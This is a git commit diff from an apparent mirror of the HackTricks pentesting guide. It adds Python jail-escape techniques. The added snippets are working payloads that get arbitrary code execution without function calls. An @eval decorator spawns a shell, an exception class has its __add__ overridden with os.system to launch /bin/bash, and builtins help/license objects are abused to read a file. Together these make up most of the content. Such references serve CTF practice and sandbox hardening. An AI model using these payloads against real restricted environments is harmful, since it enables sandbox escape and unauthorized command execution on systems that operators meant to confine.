mirror of
https://github.com/carlospolop/hacktricks.git
synced 2023-12-14 19:12:55 +01:00
GitBook: [#3304] No subject
This commit is contained in:
parent
63b9773711
commit
a5d822e198
|
@ -134,7 +134,17 @@ exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='))
|
|||
|
||||
## Python execution without calls
|
||||
|
||||
If you are inside a python jail that doesn't allow to make calls, there are still some ways to execute arbitrary functions:
|
||||
If you are inside a python jail that **doesn't allow to make calls**, there are still some ways to **execute arbitrary functions, code** and **commands**.
|
||||
|
||||
### RCE with @eval
|
||||
|
||||
```python
|
||||
@eval
|
||||
@'__import__("os").system("sh")'.format
|
||||
class _:pass
|
||||
```
|
||||
|
||||
### RCE Declaring exceptions
|
||||
|
||||
```python
|
||||
# Declare arbitrary exception class
|
||||
|
@ -143,7 +153,7 @@ class Klecko(Exception):
|
|||
return 1
|
||||
|
||||
# Change add function
|
||||
Klecko.__add__ = os.system
|
||||
Klecko.__add__ = os.system #os is already imported
|
||||
|
||||
# Generate an object of the class with a try/except + raise
|
||||
## Trick from @_nag0mez
|
||||
|
@ -180,6 +190,17 @@ __ior__ (k |= "/bin/bash -i")
|
|||
__ixor__ (k ^= "/bin/bash -i")
|
||||
```
|
||||
|
||||
### Read file with builtins help
|
||||
|
||||
```python
|
||||
__builtins__.__dict__["license"]._Printer__filenames=["flag"]
|
||||
a = __builtins__.help
|
||||
a.__class__.__enter__ = __builtins__.__dict__["license"]
|
||||
a.__class__.__exit__ = lambda self, *args: None
|
||||
with (a as b):
|
||||
pass
|
||||
```
|
||||
|
||||
## Builtins
|
||||
|
||||
* [**Builtins functions of python2**](https://docs.python.org/2/library/functions.html)
|
||||
|
|
Loading…
Reference in a new issue